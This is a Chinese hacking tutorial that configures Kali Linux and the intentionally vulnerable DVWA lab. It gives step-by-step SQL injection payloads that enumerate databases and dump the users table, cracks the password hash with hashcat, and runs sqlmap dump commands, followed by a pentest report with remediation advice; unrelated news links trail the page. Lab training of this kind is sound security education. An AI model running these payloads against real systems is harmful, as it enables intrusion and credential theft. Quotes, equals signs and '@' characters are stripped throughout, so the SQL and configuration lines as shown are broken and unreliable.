如何成为黑客:(Kali配置与DVWA渗透实战全攻略)
第一部分环境搭建步步截图级详细步骤1准备虚拟机与Kali Linux下载并安装虚拟机软件ul前往VirtualBox(https://www.virtualbox.org/) 或VMware Workstation Player(Fusion and Workstation | VMware) 官网下载并安装对应您主机系统Windows/macOS/Linux的版本。下载Kali Linux镜像访问Kali Linux 官方下载页(Get Kali | Kali Linux)选择 “Kali Linux Virtual Machines”下载适用于您虚拟机软件的版本如.ova用于 VirtualBox.vmx用于 VMware。导入并启动KaliVirtualBox打开软件 - 管理 - 导入虚拟电脑 - 选择下载的.ova文件 - 点击“导入”。导入后在列表中选择它点击“启动”。VMware打开软件 - 文件 - 打开 - 选择下载的.vmx文件。打开后点击“播放虚拟机”。默认登录凭证用户名kali密码kali。更新系统在Kali终端中执行sudo apt update sudo apt full-upgrade -y 步骤2配置攻击机Kali网络与工具设置网络为桥接模式确保攻击机和靶机在同一局域网在虚拟机软件中找到 Kali 虚拟机的设置 → 网络 → 连接方式 → 选择桥接网卡。这样 Kali 会从您的家庭路由器获取一个独立IP如同另一台真实电脑。获取Kali的IP地址ip addr show找到inet后面的地址如192.168.1.105记下它。安装并启动必要服务# 启动Apache和MySQL服务部分工具依赖 sudo systemctl start apache2 sudo systemctl start mysql 设置MySQL root密码按提示操作 sudo mysql_secure_installation步骤3部署靶机DVWA下载并解压DVWApresudo wget https://github.com/digininja/DVWA/archive/master.zip sudo unzip master.zip sudo mv DVWA-master dvwa配置数据库# 登录MySQL密码是上一步设置的 sudo mysql -u root -p在 MySQL 提示符下依次执行preCREATE USER dvwalocalhost IDENTIFIED BY pssw0rd; GRANT ALL PRIVILEGES ON dvwa.* TO dvwalocalhost; FLUSH PRIVILEGES; exit;配置DVWAcd /var/www/html/dvwa/config sudo cp config.inc.php.dist config.inc.php sudo nano config.inc.php 找到以下行确保它们与下面一致$_DVWA[ db_password ] 必须与上面创建的密码匹配 php $_DVWA[ db_server ] 127.0.0.1; $_DVWA[ db_database ] dvwa; $_DVWA[ db_user ] dvwa; $_DVWA[ db_password ] pssw0rd; $_DVWA[ default_security_level ] low; // 将安全级别设为“低”便于练习 按 CtrlX然后按 Y再按 Enter 保存退出。修改文件权限并重启服务sudo chown -R www-data:www-data /var/www/html/dvwa sudo chmod -R 755 /var/www/html/dvwa sudo systemctl restart apache2 访问DVWA在Kali的浏览器中打开http://127.0.0.1/dvwa/setup.php。点击页面底部的“Create / Reset Database”按钮。成功后使用默认凭证登录用户名admin密码password。第二部分实战操作以SQL注入为例步骤1侦察与目标确认在Kali中打开终端确认靶机DVWA的IP。由于靶机就是Kali本机所以IP是127.0.0.1。使用nmap快速扫描确认服务 应能看到80/tcp open http Apache httpd。步骤2手动SQL注入漏洞利用极度详细访问漏洞页面在浏览器中登录DVWA (http://127.0.0.1/dvwa)。左侧菜单栏点击DVWA Security将安全级别设为Low点击Submit。点击SQL Injection。探测注入点在输入框User ID中输入1点击Submit。页面显示用户ID为1的用户信息admin。关键测试1错误探测输入1数字1加一个单引号点击提交。观察页面返回SQL语法错误信息如You have an error in your SQL syntax...。这强烈暗示存在SQL注入漏洞因为单引号破坏了原SQL语句结构。关键测试2逻辑验证输入1 AND 11点击提交。页面应正常返回ID为1的用户信息。再输入1 AND 12点击提交。页面应返回空因为12为假。这确认我们可以通过注入逻辑控制SQL查询条件。确定字段数为UNION查询做准备输入1 ORDER BY 1 #提交。页面正常。输入1 ORDER BY 2 #提交。页面正常。输入1 ORDER BY 3 #提交。观察页面可能报错或返回空。这说明原始查询结果有2列。#是MySQL的注释符用于注释掉后面的SQL代码。使用UNION查询获取数据库信息输入1 UNION SELECT 1,2 #提交。观察页面某处通常在ID和First name位置会显示数字1和2。这表示这两个位置可以回显我们UNION查询的结果。获取当前数据库名输入1 UNION SELECT database(), version() #提交。页面会在对应位置显示当前数据库名应为dvwa和MySQL版本号。获取所有数据库名输入1 UNION SELECT schema_name, NULL FROM information_schema.schemata #提交。页面会列出MySQL中所有数据库的名称。获取当前数据库的所有表名输入1 UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema database() #提交。页面会显示dvwa数据库中的所有表如guestbook、users等。获取关键表如users的列名输入1 UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_schema database() AND table_name users #提交。页面会显示users表的所有列名如user_id、first_name、last_name、user、password、avatar等。最终攻击拖取用户凭证输入1 UNION SELECT user, password FROM users #提交。页面将直接显示所有用户名和经过MD5哈希的密码。例如admin的密码哈希是5f4dcc3b5aa765d61d8327deb882cf99。密码破解离线复制5f4dcc3b5aa765d61d8327deb882cf99。在Kali终端中使用hashcat或在线MD5解密网站仅用于练习进行破解。这是一个非常简单的MD5哈希对应明文是password。使用hashcat的命令示例echo 5f4dcc3b5aa765d61d8327deb882cf99 hash.txt hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --forcerockyou.txt是Kali自带的常用密码字典。步骤3使用自动化工具sqlmap进行验证启动Burp Suite并设置代理可选用于拦截请求ul在Kali中打开Burp Suite (Community Edition)。打开浏览器设置代理为127.0.0.1:8080。访问DVWA的SQL注入页面提交一个正常请求如id1在Burp中拦截该请求将其右键 - Copy to file保存为request.txt。使用sqlmap在终端中进入保存request.txt的目录执行sqlmap -r request.txt --batch --dbs * -r request.txt从文件中读取HTTP请求。 * --batch以非交互模式运行自动选择默认选项。 * --dbs枚举数据库。sqlmap会自动检测注入点、类型并列出所有数据库。后续可以使用-D dvwa --tables枚举表-D dvwa -T users --dump导出表数据。第三部分环境清理与报告模板清理# 在Kali中删除DVWA sudo rm -rf /var/www/html/dvwa # 在MySQL中删除数据库和用户 sudo mysql -u root -pDROP DATABASE dvwa; DROP USER dvwalocalhost; exit;渗透测试报告简化模板# 渗透测试报告 - DVWA靶场 目标: http://127.0.0.1/dvwa 测试类型: 授权白盒测试 发现日期: [日期] 1. 高危漏洞 - SQL注入 (CWE-89) 位置: /dvwa/vulnerabilities/sqli/ 参数: id (GET) 安全级别: Low 漏洞描述 应用程序未对用户输入的id参数进行过滤直接拼接至SQL查询语句中导致攻击者可执行任意SQL命令。 复现步骤 访问 http://127.0.0.1/dvwa/vulnerabilities/sqli/。 在输入框输入 1 UNION SELECT user, password FROM users # 点击提交。 影响 成功获取users表中所有用户的登录名及MD5哈希密码导致凭证泄露可进一步破解并获取系统权限。 修复建议 使用参数化查询预编译语句。 PHP示例使用PDO $stmt-gt;execute([id gt;$id]); $results $stmt-gt;fetchAll();对输入进行严格的类型转换如intval($id)。遵循最小权限原则数据库用户不应拥有information_schema的访问权限。

相关新闻

太空AI化:技术奇点与轨道计算的未来

太空AI化:技术奇点与轨道计算的未来

1. 访谈核心观点解析马斯克在最新3小时访谈中提出的太空与AI发展预测,本质上是对技术奇点临近的又一次预警。这位科技狂人向来以激进的时间表著称,但这次提出的"36个月窗口期"理论确实包含几个值得深思的技术逻辑:首先将太空视为AI…

2026/7/24 18:22:14阅读更多 →
Unity径向菜单插件Tasty Pie Menu:多平台交互优化与性能调优指南

Unity径向菜单插件Tasty Pie Menu:多平台交互优化与性能调优指南

1. 项目概述:为什么我们需要一个“好吃”的径向菜单?在游戏和应用开发中,UI交互的直观性和响应速度直接决定了用户体验的上限。当你的项目需要在一个有限的空间内(比如手柄的摇杆、VR中的手势、或者屏幕上的一个热点区域&#xff…

2026/7/24 18:22:14阅读更多 →
白宫后量子行政令落地:后量子迁移正式进入行动阶段

白宫后量子行政令落地:后量子迁移正式进入行动阶段

1. 引言 2026 年 6 月 22 日,特朗普总统签署了第 14412 号行政令——《保护国家免受高级密码攻击》。该行政令要求联邦机构在 2030 年 12 月 31 日前,将其最敏感的系统迁移到后量子加密;并在 2031 年 12 月 31 日前完成后量子认证迁移。行政令…

2026/7/24 18:20:14阅读更多 →
LoRA微调技术解析:轻量化适配大模型的黄金法则

LoRA微调技术解析:轻量化适配大模型的黄金法则

1. LoRA微调技术解析:轻量化适配大模型的黄金法则在自然语言处理领域,微调预训练大语言模型(LLM)一直是提升模型特定任务表现的核心手段。但传统全参数微调方法面临显存占用高、计算资源消耗大等痛点,尤其当模型参数规…

2026/7/24 19:46:27阅读更多 →
基于cGAN的DCE-MRI参数预测在乳腺癌化疗评估中的应用

基于cGAN的DCE-MRI参数预测在乳腺癌化疗评估中的应用

1. 项目背景与核心价值乳腺癌新辅助化疗(NAC)反应评估是临床治疗中的关键环节。传统评估方法主要依赖病理完全缓解(pCR)的术后检测,但这种"事后验证"方式无法为治疗过程中的方案调整提供实时指导。动态对比增强磁共振成像(DCE-MRI)通过追踪造影剂在血管内…

2026/7/24 19:46:27阅读更多 →
在Windows和Linux上轻松运行macOS虚拟机的终极指南

在Windows和Linux上轻松运行macOS虚拟机的终极指南

在Windows和Linux上轻松运行macOS虚拟机的终极指南 【免费下载链接】unlocker VMware Workstation macOS 项目地址: https://gitcode.com/gh_mirrors/unloc/unlocker 想要在普通PC上体验macOS的流畅界面和独特功能吗?VMware macOS解锁工具Unlocker为你提供了…

2026/7/24 19:46:27阅读更多 →
AI工程与科学严谨性失衡:从基准测试到真实场景的挑战与解决方案

AI工程与科学严谨性失衡:从基准测试到真实场景的挑战与解决方案

如果你正在使用或开发AI系统,可能已经注意到一个现象:模型在基准测试中表现优异,但在真实场景中却频繁出错。这不是简单的"准确率不够高"的问题,而是AI发展正面临的一个更深层次挑战——工程上的过度优化与科学基础的相…

2026/7/24 19:46:27阅读更多 →
深入解析LM36010同步升压LED闪光灯驱动器:从原理到实战应用

深入解析LM36010同步升压LED闪光灯驱动器:从原理到实战应用

1. 项目概述:为什么我们需要一颗专用的闪光灯驱动芯片?在手机、平板电脑或者便携式扫描仪上,当你按下拍照键,那一瞬间迸发出的明亮闪光,背后远不止是简单地给一颗LED灯珠通电那么简单。这颗小小的闪光灯LED&#xff0c…

2026/7/24 19:46:27阅读更多 →
小爱同学上车:智能座舱语音交互的技术突破与实践

小爱同学上车:智能座舱语音交互的技术突破与实践

最近不少车主都在讨论一个话题:为什么我的车机语音助手总是像个"人工智障"?导航时说不清具体路口,想调空调温度还得手动操作,更别提那些复杂的多轮对话了。就在大家以为车载语音助手也就这样的时候,小米汽车…

2026/7/24 19:44:27阅读更多 →
Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/24 0:58:53阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/24 0:58:53阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/24 0:58:53阅读更多 →
我的编程之路:第一篇博客

我的编程之路:第一篇博客

大家好,我是一名编程初学者,同时这也是我编程学习之路上的第一篇博客。在这里,我想要向大家介绍我的一些想法和规划。a.自我介绍我是一个刚刚接触编程的新手,目前在学习c语言,我对编程世界充满了强烈的好奇。当然&…

2026/7/24 0:00:06阅读更多 →
【LeetCode 54】螺旋矩阵

【LeetCode 54】螺旋矩阵

问题描述: 解法: 1、模拟(参考自【LeetCode 54】螺旋矩阵-CSDN博客) int *spiralOrder(int **matrix, int matrixSize, int *matrixColSize, int *returnSize) {static const int dirs[4][2] {{0, 1}, {1, 0}, {0, -1}, {-1, …

2026/7/24 0:00:06阅读更多 →
2026 WAIC:模型隐身、智能体疯野,厂商竞赛聚焦办公场景与商业闭环

2026 WAIC:模型隐身、智能体疯野,厂商竞赛聚焦办公场景与商业闭环

知春路不相信模型领先今年WAIC大会,昔日AI六小龙来了五家,分别是Kimi、阶跃星辰、Minimax、百川智能、零一万物。连放弃基模的百川和零一万物都来了,唯一缺席的竟是近几个月来风光无限的智谱。(DeepSeek一直不参加)WAI…

2026/7/24 0:00:06阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/23 22:58:43阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/24 19:00:40阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/24 19:00:40阅读更多 →